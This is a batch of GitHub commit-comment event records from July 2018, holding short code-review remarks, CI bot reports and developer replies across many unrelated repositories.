{"id":"7949348841","type":"CommitCommentEvent","actor":{"login":"golankopi"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29669342,"position":9,"line":9,"path":"Theoretical-part.txt","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-11T11:04:01Z","updated_at":"2018-07-11T11:04:01Z","author_association":"NONE","body":"Please be more specific and describe your flow. larger scale also means more API servers under some kind of load balancer."}},"created_at":"2018-07-11T11:04:01Z"}
{"id":"7949348917","type":"CommitCommentEvent","actor":{"login":"blocklist"},"repo":{"name":"NightscoutFoundation/xDrip"},"payload":{"comment":{"id":29669343,"position":null,"line":null,"path":null,"commit_id":"d274b71dc0274feb271d0eb45439aa4a014b67a7","created_at":"2018-07-11T11:04:02Z","updated_at":"2018-07-11T11:04:02Z","author_association":"NONE","body":"i add it only on /app/, but works for me :+1: "}},"created_at":"2018-07-11T11:04:02Z"}
{"id":"7949350077","type":"CommitCommentEvent","actor":{"login":"tking53"},"repo":{"name":"pixie16/paass"},"payload":{"comment":{"id":29669349,"position":null,"line":null,"path":null,"commit_id":"996abfdb5bec8ef7f87cb4b281bc144ebdd9edc4","created_at":"2018-07-11T11:04:17Z","updated_at":"2018-07-11T11:04:17Z","author_association":"COLLABORATOR","body":"Thanks for pointing it out. "}},"created_at":"2018-07-11T11:04:17Z"}
{"id":"7949352059","type":"CommitCommentEvent","actor":{"login":"catalinberta"},"repo":{"name":"reionut/responsive-test"},"payload":{"comment":{"id":29669352,"position":4,"line":81,"path":"header/header.css","commit_id":"c03cf47964a524e54ba968e8fad4369140d50423","created_at":"2018-07-11T11:04:43Z","updated_at":"2018-07-11T11:04:43Z","author_association":"COLLABORATOR","body":"I see you are using REMs and VWs in various locations, can you tell me the difference between them and when you should use one or the other?"}},"created_at":"2018-07-11T11:04:43Z"}
{"id":"7949354349","type":"CommitCommentEvent","actor":{"login":"VSRonin"},"repo":{"name":"VSRonin/ChatExample"},"payload":{"comment":{"id":29669356,"position":112,"line":143,"path":"QtSimpleChatClient/chatwindow.cpp","commit_id":"b75f93e7124bbbf9e22d061ed85e4de0c95069c0","created_at":"2018-07-11T11:05:16Z","updated_at":"2018-07-11T11:05:16Z","author_association":"OWNER","body":"If username contains %1 the second `arg` fails, use `arg(QString,QString)` or the more efficient `message.username() + \": \"+ message.text()`"}},"created_at":"2018-07-11T11:05:16Z"}
{"id":"7949357073","type":"CommitCommentEvent","actor":{"login":"Liugq5713"},"repo":{"name":"Amoxi1/test"},"payload":{"comment":{"id":29669365,"position":70,"line":72,"path":"todo.js","commit_id":"652962994343f0f735419533c0139662e515136b","created_at":"2018-07-11T11:05:51Z","updated_at":"2018-07-11T11:05:51Z","author_association":"NONE","body":"document.querySelector() 了解一下啊！！！！！改掉"}},"created_at":"2018-07-11T11:05:51Z"}
{"id":"7949359974","type":"CommitCommentEvent","actor":{"login":"golankopi"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29669372,"position":7,"line":7,"path":"Theoretical-part.txt","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-11T11:06:29Z","updated_at":"2018-07-11T11:06:29Z","author_association":"NONE","body":"I don't understand- the worker will handle each user request to the server? Please be more specific."}},"created_at":"2018-07-11T11:06:29Z"}
{"id":"7949361673","type":"CommitCommentEvent","actor":{"login":"Liugq5713"},"repo":{"name":"Amoxi1/test"},"payload":{"comment":{"id":29669376,"position":31,"line":38,"path":"todo.js","commit_id":"652962994343f0f735419533c0139662e515136b","created_at":"2018-07-11T11:06:52Z","updated_at":"2018-07-11T11:06:52Z","author_association":"NONE","body":"删除和修改，你这样给每一个事件都增加了一个监听键盘点击的事件，请了解以下事件委托，然后改写一下你的代码"}},"created_at":"2018-07-11T11:06:52Z"}
{"id":"7949362926","type":"CommitCommentEvent","actor":{"login":"bbatsov"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29669378,"position":96,"line":85,"path":"doc/installation.md","commit_id":"bea031f8b2e96ad3e8279f36b384a60693f53e4b","created_at":"2018-07-11T11:07:10Z","updated_at":"2018-07-11T11:07:10Z","author_association":"OWNER","body":"Yeah, good catch. I was thinking about projectile-global-mode around that\ntime and I made a silly mistake. :-)\n\nOn Wed, 11 Jul 2018 at 13:57, tee3 <notifications@github.com> wrote:\n\n> Should this be (projectile-mode +1) as in the non-pinned use-package\n> above? Isn't projectile-global-mode remove and / or deprecated now?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/bbatsov/projectile/commit/bea031f8b2e96ad3e8279f36b384a60693f53e4b#commitcomment-29669267>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAGVyoCrKbCjrtploG5ng3Zd2Yh8tQjFks5uFdo1gaJpZM4VK7Jc>\n> .\n>\n\n\n-- \nBest Regards,\nBozhidar Batsov\n\nhttp://www.batsov.com\n"}},"created_at":"2018-07-11T11:07:10Z"}
{"id":"7949363607","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29669380,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-11T11:07:19Z","updated_at":"2018-07-11T11:07:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T11:07:19Z"}
{"id":"7949363653","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29669381,"position":null,"line":null,"path":null,"commit_id":"207158531e97fac46cfaa6a46c66601e4b30fbf9","created_at":"2018-07-11T11:07:20Z","updated_at":"2018-07-11T11:07:20Z","author_association":"OWNER","body":"I forget the exact details -- maybe @smiths has an example closer to mind.  But there were certainly multiple manual examples that had 'where' clauses defining (local) values. Most recently, didn't we hack \\tau_W in one of the examples for this very reason?"}},"created_at":"2018-07-11T11:07:20Z"}
{"id":"7949366124","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/meikaijava"},"payload":{"comment":{"id":29669382,"position":19,"line":19,"path":"e_16/src/e_16_1/e_16_1.java","commit_id":"5ccc6b59eb377def92bd36b7b42e7983e75c0f1b","created_at":"2018-07-11T11:07:53Z","updated_at":"2018-07-11T11:07:53Z","author_association":"COLLABORATOR","body":"柴田\r\nONE や TWOを使ってしまうとマジックナンバーとあまり変わらなくなります。\r\nあまり使用しないように注意してください。1番目、2番目と意味のある場合であれば別です。"}},"created_at":"2018-07-11T11:07:53Z"}
{"id":"7949375347","type":"CommitCommentEvent","actor":{"login":"muddyfish"},"repo":{"name":"wtsi-cogs/webapp"},"payload":{"comment":{"id":29669401,"position":null,"line":null,"path":null,"commit_id":"afcafa2352c07b8daa78ac6b36b5cf2e54bacb6f","created_at":"2018-07-11T11:09:53Z","updated_at":"2018-07-11T11:09:53Z","author_association":"CONTRIBUTOR","body":"Fixes issue #4 "}},"created_at":"2018-07-11T11:09:53Z"}
{"id":"7949376618","type":"CommitCommentEvent","actor":{"login":"chrizzTs"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29669404,"position":null,"line":null,"path":null,"commit_id":"5e3b471f4a67553d6f7525595b15dc3d7b4efb3f","created_at":"2018-07-11T11:10:09Z","updated_at":"2018-07-11T11:10:09Z","author_association":"NONE","body":"@simongoffin I found a solution to apprently fix this. When using Nginx or appache as web server infront of odoo server, this can be solved. \r\nUnfortunately if you now disable this feature, it is not possible to play in IOs with this anymore.\r\nTherefore I think it is better to revert your commit!"}},"created_at":"2018-07-11T11:10:09Z"}
{"id":"7949384466","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29669412,"position":null,"line":null,"path":null,"commit_id":"6c6e48a52587df105595ce7893602c93a829992f","created_at":"2018-07-11T11:11:52Z","updated_at":"2018-07-11T11:11:52Z","author_association":"OWNER","body":"So the problem with this definition is that we really ought to first define the notion of 'scope', and then the `Local` scope should take a scope as a parameter.\r\n\r\nFor now, we can probably make a scope be specified via an indirect reference, i.e. a `Label`. We can later decide which things define new scopes (such as `DataDefinition`s), and make it an error to scope something to an element which does not in fact define a scope."}},"created_at":"2018-07-11T11:11:52Z"}
{"id":"7949385770","type":"CommitCommentEvent","actor":{"login":"varton86"},"repo":{"name":"varton86/TestWeather"},"payload":{"comment":{"id":29669417,"position":null,"line":null,"path":null,"commit_id":"233dbbce272d473a015f9a966b09af1eb65e4a2d","created_at":"2018-07-11T11:12:10Z","updated_at":"2018-07-11T11:12:10Z","author_association":"OWNER","body":"Test Weather App (iOS 10.x, Swift 4.x, Xcode 9.x)"}},"created_at":"2018-07-11T11:12:10Z"}
{"id":"7949386285","type":"CommitCommentEvent","actor":{"login":"Rose8801"},"repo":{"name":"Rose8801/Rose88-ivy"},"payload":{"comment":{"id":29669420,"position":null,"line":null,"path":null,"commit_id":"360259eb44337f6941ea33858fd8a7e60e03bf2e","created_at":"2018-07-11T11:12:16Z","updated_at":"2018-07-11T11:12:16Z","author_association":"OWNER","body":" if (command === \"iv\") {\r\n   // Specific code of my own.\r\n   if (args[0] == '<@240235446020472833>' | args[0] == 'rose' | args[0] == 'rose88' | args[0] == 'rose888') {\r\n       message.channel.send('Top secret :joy:!!!');\r\n       return;\r\n   }\r\n   // Specific code of my own - END"}},"created_at":"2018-07-11T11:12:16Z"}
{"id":"7949387878","type":"CommitCommentEvent","actor":{"login":"onigetoc"},"repo":{"name":"onigetoc/Podcast-parser-for-jPlayer"},"payload":{"comment":{"id":29669429,"position":null,"line":null,"path":null,"commit_id":"ad290602e7828d323e90b235fe48aa1d0fa54668","created_at":"2018-07-11T11:12:35Z","updated_at":"2018-07-11T11:12:35Z","author_association":"OWNER","body":"It may be du to php version.\r\nMy version work well on php 7.1\r\n\r\n"}},"created_at":"2018-07-11T11:12:35Z"}
{"id":"7949387979","type":"CommitCommentEvent","actor":{"login":"barancev"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29669430,"position":null,"line":null,"path":null,"commit_id":"5289e9779a6594dcada5f5095e81ba8eafe62110","created_at":"2018-07-11T11:12:37Z","updated_at":"2018-07-11T11:12:37Z","author_association":"MEMBER","body":"1) There is already `StatusServletTests` in `org.openqa.grid.internal` package, I think we should better add more tests to this calss instead of adding another one.\r\n\r\n2) This commit broke some tests in `StatusServletTests`, please resolve these failures."}},"created_at":"2018-07-11T11:12:37Z"}
{"id":"7949395503","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"wilkinsona/spring-boot"},"payload":{"comment":{"id":29669444,"position":53,"line":53,"path":"spring-boot-project/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/jdbc/StandardDataSourceInitializationRegistry.java","commit_id":"05663b430963233289d184f7c1d9c7ae6d245423","created_at":"2018-07-11T11:14:15Z","updated_at":"2018-07-11T11:14:15Z","author_association":"COLLABORATOR","body":"At first sight, it feels odd that the registry does both the registration and the actual initialization (nothing in its name says that). Perhaps the change would be less important if this component was delegating to the current invoker as well?"}},"created_at":"2018-07-11T11:14:15Z"}
{"id":"7949399751","type":"CommitCommentEvent","actor":{"login":"eksperimental"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29669452,"position":null,"line":null,"path":null,"commit_id":"d9ffe1f47fcb1c2d2ce7c852775ad9479859edf6","created_at":"2018-07-11T11:15:09Z","updated_at":"2018-07-11T11:15:09Z","author_association":"MEMBER","body":"Thank you. This was part of another PD that was a  WIP. I managed to slip through"}},"created_at":"2018-07-11T11:15:09Z"}
{"id":"7949414126","type":"CommitCommentEvent","actor":{"login":"YIRanTang"},"repo":{"name":"YIRanTang/git_demo"},"payload":{"comment":{"id":29669479,"position":3,"line":3,"path":"test_code.py","commit_id":"316f8259a55bf47fbbcc110c878ea1744d80ca50","created_at":"2018-07-11T11:18:15Z","updated_at":"2018-07-11T11:18:15Z","author_association":"OWNER","body":"??"}},"created_at":"2018-07-11T11:18:15Z"}
{"id":"7949417904","type":"CommitCommentEvent","actor":{"login":"odony"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29669485,"position":45,"line":611,"path":"addons/account/views/account_view.xml","commit_id":"8f88c0336f881dd59d7c25b64c5bcba1989f998b","created_at":"2018-07-11T11:19:05Z","updated_at":"2018-07-11T11:19:05Z","author_association":"CONTRIBUTOR","body":"@tivisse That was a very unfortunate choice of name, especially as it conflicts with the field 7 lines above. Further, it would make sense to name \"group by\" filters with a \"group_\" prefix (or something similar).\r\n\r\nCurrently you will see context keys like `'search_default_date': 1` which make little sense, on top of being very conflict-prone, like here.\r\n\r\nCan we fix this everywhere please?\r\n\r\n/cc @qdp-odoo "}},"created_at":"2018-07-11T11:19:05Z"}
{"id":"7949419494","type":"CommitCommentEvent","actor":{"login":"ShandilyaUjjwal"},"repo":{"name":"ShandilyaUjjwal/colab-practice"},"payload":{"comment":{"id":29669489,"position":null,"line":null,"path":null,"commit_id":"6e65df5cff40ac3e7add32a085fd0e479e096c4f","created_at":"2018-07-11T11:19:25Z","updated_at":"2018-07-11T11:19:25Z","author_association":"OWNER","body":"#rjhitoil"}},"created_at":"2018-07-11T11:19:25Z"}
{"id":"7949421658","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"react-component/tabs"},"payload":{"comment":{"id":29669493,"position":null,"line":null,"path":null,"commit_id":"23c6762968f014f72e6c9e920b3926b3de39722e","created_at":"2018-07-11T11:19:52Z","updated_at":"2018-07-11T11:19:52Z","author_association":"MEMBER","body":"发 9.3.0 吧"}},"created_at":"2018-07-11T11:19:52Z"}
{"id":"7949423094","type":"CommitCommentEvent","actor":{"login":"slluis"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":29669497,"position":null,"line":null,"path":null,"commit_id":"e302278e00acbb02b04908fdb44ef008f019ae02","created_at":"2018-07-11T11:20:11Z","updated_at":"2018-07-11T11:20:11Z","author_association":"MEMBER","body":"@mono/monodevelop-core-owners Test"}},"created_at":"2018-07-11T11:20:11Z"}
{"id":"7949425460","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29669501,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-11T11:20:40Z","updated_at":"2018-07-11T11:20:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T11:20:40Z"}
{"id":"7949426805","type":"CommitCommentEvent","actor":{"login":"ShandilyaUjjwal"},"repo":{"name":"ShandilyaUjjwal/colab-practice"},"payload":{"comment":{"id":29669507,"position":null,"line":null,"path":null,"commit_id":"6e65df5cff40ac3e7add32a085fd0e479e096c4f","created_at":"2018-07-11T11:20:58Z","updated_at":"2018-07-11T11:20:58Z","author_association":"OWNER","body":"# hi\r\n"}},"created_at":"2018-07-11T11:20:58Z"}
{"id":"7949429308","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"DDT-Kibe/meikai_java2018_04"},"payload":{"comment":{"id":29669510,"position":24,"line":24,"path":"meikai_java2018_05/src/e_03/e_03_01.java","commit_id":"0e717012c6e065bd7d0a4fbdb209a94382abcf2b","created_at":"2018-07-11T11:21:33Z","updated_at":"2018-07-11T11:21:33Z","author_association":"COLLABORATOR","body":"柴田\r\nif文の後のブロック { } は1行でも必ずつけてください。\r\n※閉じかっこ } のみの部分にコメントは不要"}},"created_at":"2018-07-11T11:21:33Z"}
{"id":"7949429425","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29669511,"position":null,"line":null,"path":null,"commit_id":"7b46b93c579321a0162457e2dd7ca1be96a0e7ed","created_at":"2018-07-11T11:21:35Z","updated_at":"2018-07-11T11:21:35Z","author_association":"MEMBER","body":"This includes upstream patches for:\r\n\r\n- Bug 1363216 - Turn off std::future for MinGW.\r\n- Bug 1331335 - Add SSE2 Flags to all of libANGLE.\r\n- Bug 1364169 - on ANGLE context creation asks for robustness but does not get it.\r\n- Bug 1370865 - Suppress more MSVC warnings in gfx/angle.\r\n- Bug 1373525 - gfx/angle: Suppress -Wimplicit-fallthrough warnings in third-party code.\r\n- Bug 1347866 - Part3: ANGLE patch uplift for bug1325733.\r\n- Bug 1347866 - Part4: ANGLE patch uplift for bug1325741.\r\n- Bug 1322746 - Add general ID3D11Texture2D to EGLStream support to ANGLE.\r\n- Bug 1366425 - Avoid losing context on out of memory error for ANGLE."}},"created_at":"2018-07-11T11:21:35Z"}
{"id":"7949464109","type":"CommitCommentEvent","actor":{"login":"amihaiemil"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29669586,"position":12,"line":48,"path":"src/main/java/com/zerocracy/tk/TkTeam.java","commit_id":"56a5b5bd985fdc0129268f8683bcfa0fcc07d446","created_at":"2018-07-11T11:29:27Z","updated_at":"2018-07-11T11:29:27Z","author_association":"CONTRIBUTOR","body":"@krzyk Did you merge this file correctly? This ``>>>> master`` shouldn't be here. "}},"created_at":"2018-07-11T11:29:27Z"}
{"id":"7949469776","type":"CommitCommentEvent","actor":{"login":"kroman0"},"repo":{"name":"openprocurement/openprocurement.api"},"payload":{"comment":{"id":29669602,"position":3,"line":3,"path":"src/openprocurement/api/roles.py","commit_id":"434b38dbd7dd6725cb1ad0273132cb21ef00ebd5","created_at":"2018-07-11T11:30:44Z","updated_at":"2018-07-11T11:30:44Z","author_association":"CONTRIBUTOR","body":"Дубляж os"}},"created_at":"2018-07-11T11:30:44Z"}
{"id":"7949470121","type":"CommitCommentEvent","actor":{"login":"mdorman"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29669603,"position":null,"line":null,"path":null,"commit_id":"48ccdf322d9e7a68d0caf5833511ee3e53ec7d3a","created_at":"2018-07-11T11:30:48Z","updated_at":"2018-07-11T11:30:48Z","author_association":"CONTRIBUTOR","body":"@Ericson2314 My emacs expression now fails with: \r\n```\r\nerror: attribute 'fixed-points' missing, at /var/nixup/nixpkgs/lib/customisation.nix:205:14\r\n(use '--show-trace' to show detailed location information)\r\n```"}},"created_at":"2018-07-11T11:30:48Z"}
{"id":"7949471352","type":"CommitCommentEvent","actor":{"login":"wilkinsona"},"repo":{"name":"wilkinsona/spring-boot"},"payload":{"comment":{"id":29669605,"position":45,"line":108,"path":"spring-boot-project/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/jdbc/DataSourceConfiguration.java","commit_id":"05663b430963233289d184f7c1d9c7ae6d245423","created_at":"2018-07-11T11:31:05Z","updated_at":"2018-07-11T11:31:05Z","author_association":"OWNER","body":"👍 "}},"created_at":"2018-07-11T11:31:05Z"}
{"id":"7949472533","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"DDT-Kibe/meikai_java2018_04"},"payload":{"comment":{"id":29669610,"position":24,"line":24,"path":"meikai_java2018_05/src/e_03/e_03_01.java","commit_id":"0e717012c6e065bd7d0a4fbdb209a94382abcf2b","created_at":"2018-07-11T11:31:21Z","updated_at":"2018-07-11T11:31:21Z","author_association":"COLLABORATOR","body":"柴田\r\n補足：教本では少し後で出てくるため、当時点では教本外の内容でした。\r\n慣れも含め付けるようにしてください。"}},"created_at":"2018-07-11T11:31:21Z"}
{"id":"7949473755","type":"CommitCommentEvent","actor":{"login":"wilkinsona"},"repo":{"name":"wilkinsona/spring-boot"},"payload":{"comment":{"id":29669612,"position":53,"line":53,"path":"spring-boot-project/spring-boot-autoconfigure/src/main/java/org/springframework/boot/autoconfigure/jdbc/StandardDataSourceInitializationRegistry.java","commit_id":"05663b430963233289d184f7c1d9c7ae6d245423","created_at":"2018-07-11T11:31:38Z","updated_at":"2018-07-11T11:31:38Z","author_association":"OWNER","body":"Reusing a slightly modified `DataSourceInitializer` looks like it'll work. Update on its way to do just that."}},"created_at":"2018-07-11T11:31:38Z"}
{"id":"7949474357","type":"CommitCommentEvent","actor":{"login":"andriyun"},"repo":{"name":"vejle-idraetshoejskole/web"},"payload":{"comment":{"id":29669613,"position":5,"line":856,"path":"config/sync/config_ignore.settings.yml","commit_id":"e88c23d938ada85f5574f43038cb87ca7ee371dc","created_at":"2018-07-11T11:31:47Z","updated_at":"2018-07-11T11:31:47Z","author_association":"COLLABORATOR","body":"This field has been renamed  few weeks ago"}},"created_at":"2018-07-11T11:31:47Z"}
{"id":"7949474668","type":"CommitCommentEvent","actor":{"login":"andriyun"},"repo":{"name":"vejle-idraetshoejskole/web"},"payload":{"comment":{"id":29669614,"position":14,"line":1075,"path":"config/sync/config_ignore.settings.yml","commit_id":"e88c23d938ada85f5574f43038cb87ca7ee371dc","created_at":"2018-07-11T11:31:51Z","updated_at":"2018-07-11T11:31:51Z","author_association":"COLLABORATOR","body":"This field has been renamed  few weeks ago"}},"created_at":"2018-07-11T11:31:51Z"}
{"id":"7949477804","type":"CommitCommentEvent","actor":{"login":"trungams"},"repo":{"name":"idoneam/Canary"},"payload":{"comment":{"id":29669619,"position":null,"line":null,"path":null,"commit_id":"edbe2c0c8230747e773d2ea617c71e81fcd860ae","created_at":"2018-07-11T11:32:33Z","updated_at":"2018-07-11T11:32:33Z","author_association":"NONE","body":"Update on #75 "}},"created_at":"2018-07-11T11:32:33Z"}
{"id":"7949484524","type":"CommitCommentEvent","actor":{"login":"TheWaWaR"},"repo":{"name":"cryptape/cita-cli"},"payload":{"comment":{"id":29669646,"position":69,"line":1156,"path":"cita-cli/src/cli.rs","commit_id":"a5c6f98a2258902f1913565af88f5cce724a3231","created_at":"2018-07-11T11:34:07Z","updated_at":"2018-07-11T11:34:07Z","author_association":"MEMBER","body":"Should be more specific, **from** address"}},"created_at":"2018-07-11T11:34:07Z"}
{"id":"7949484554","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29669648,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-11T11:34:07Z","updated_at":"2018-07-11T11:34:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T11:34:07Z"}
{"id":"7949485179","type":"CommitCommentEvent","actor":{"login":"draganrak"},"repo":{"name":"draganrak/first-project"},"payload":{"comment":{"id":29669651,"position":null,"line":null,"path":null,"commit_id":"b01b023d8616a57343b6f0803a896a3f75634b9c","created_at":"2018-07-11T11:34:14Z","updated_at":"2018-07-11T11:34:14Z","author_association":"OWNER","body":"added red"}},"created_at":"2018-07-11T11:34:14Z"}
{"id":"7949486614","type":"CommitCommentEvent","actor":{"login":"draganrak"},"repo":{"name":"draganrak/first-project"},"payload":{"comment":{"id":29669656,"position":5,"line":12,"path":"jquery_1.html","commit_id":"b01b023d8616a57343b6f0803a896a3f75634b9c","created_at":"2018-07-11T11:34:33Z","updated_at":"2018-07-11T11:34:33Z","author_association":"OWNER","body":"addded red"}},"created_at":"2018-07-11T11:34:33Z"}
{"id":"7949487102","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":29669657,"position":null,"line":null,"path":null,"commit_id":"e302278e00acbb02b04908fdb44ef008f019ae02","created_at":"2018-07-11T11:34:39Z","updated_at":"2018-07-11T11:34:39Z","author_association":"MEMBER","body":"Yup, got a notification."}},"created_at":"2018-07-11T11:34:39Z"}
{"id":"7949488783","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29669660,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-11T11:35:02Z","updated_at":"2018-07-11T11:35:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-11T11:35:02Z"}
{"id":"7949494748","type":"CommitCommentEvent","actor":{"login":"Habrabiggie"},"repo":{"name":"Habrabiggie/Algorithms"},"payload":{"comment":{"id":29669676,"position":null,"line":null,"path":null,"commit_id":"bbddb8e3867cd05bc89920cf6731607ab7b863db","created_at":"2018-07-11T11:36:22Z","updated_at":"2018-07-11T11:36:22Z","author_association":"OWNER","body":"Arrays"}},"created_at":"2018-07-11T11:36:22Z"}
{"id":"7949496556","type":"CommitCommentEvent","actor":{"login":"andriyun"},"repo":{"name":"vejle-idraetshoejskole/web"},"payload":{"comment":{"id":29669678,"position":4,"line":68,"path":"config/sync/core.entity_view_display.taxonomy_term.vih_class.list_advanced.yml","commit_id":"e88c23d938ada85f5574f43038cb87ca7ee371dc","created_at":"2018-07-11T11:36:45Z","updated_at":"2018-07-11T11:36:45Z","author_association":"COLLABORATOR","body":"this field is not exist in vih_class vocabulary for VIH project"}},"created_at":"2018-07-11T11:36:45Z"}
{"id":"7949496894","type":"CommitCommentEvent","actor":{"login":"andriyun"},"repo":{"name":"vejle-idraetshoejskole/web"},"payload":{"comment":{"id":29669680,"position":4,"line":50,"path":"config/sync/core.entity_view_display.taxonomy_term.vih_class.teaser.yml","commit_id":"e88c23d938ada85f5574f43038cb87ca7ee371dc","created_at":"2018-07-11T11:36:50Z","updated_at":"2018-07-11T11:36:50Z","author_association":"COLLABORATOR","body":"this field is not exist in vih_class vocabulary for VIH project"}},"created_at":"2018-07-11T11:36:50Z"}
{"id":"7949497200","type":"CommitCommentEvent","actor":{"login":"andriyun"},"repo":{"name":"vejle-idraetshoejskole/web"},"payload":{"comment":{"id":29669681,"position":4,"line":50,"path":"config/sync/core.entity_view_display.taxonomy_term.vih_class.vih_class_table_teaser.yml","commit_id":"e88c23d938ada85f5574f43038cb87ca7ee371dc","created_at":"2018-07-11T11:36:54Z","updated_at":"2018-07-11T11:36:54Z","author_association":"COLLABORATOR","body":"this field is not exist in vih_class vocabulary for VIH project"}},"created_at":"2018-07-11T11:36:54Z"}
{"id":"7949497577","type":"CommitCommentEvent","actor":{"login":"andriyun"},"repo":{"name":"vejle-idraetshoejskole/web"},"payload":{"comment":{"id":29669683,"position":4,"line":50,"path":"config/sync/core.entity_view_display.taxonomy_term.vih_class.vih_class_table_teaser_modal.yml","commit_id":"e88c23d938ada85f5574f43038cb87ca7ee371dc","created_at":"2018-07-11T11:36:58Z","updated_at":"2018-07-11T11:36:58Z","author_association":"COLLABORATOR","body":"this field is not exist in vih_class vocabulary for VIH project"}},"created_at":"2018-07-11T11:36:58Z"}
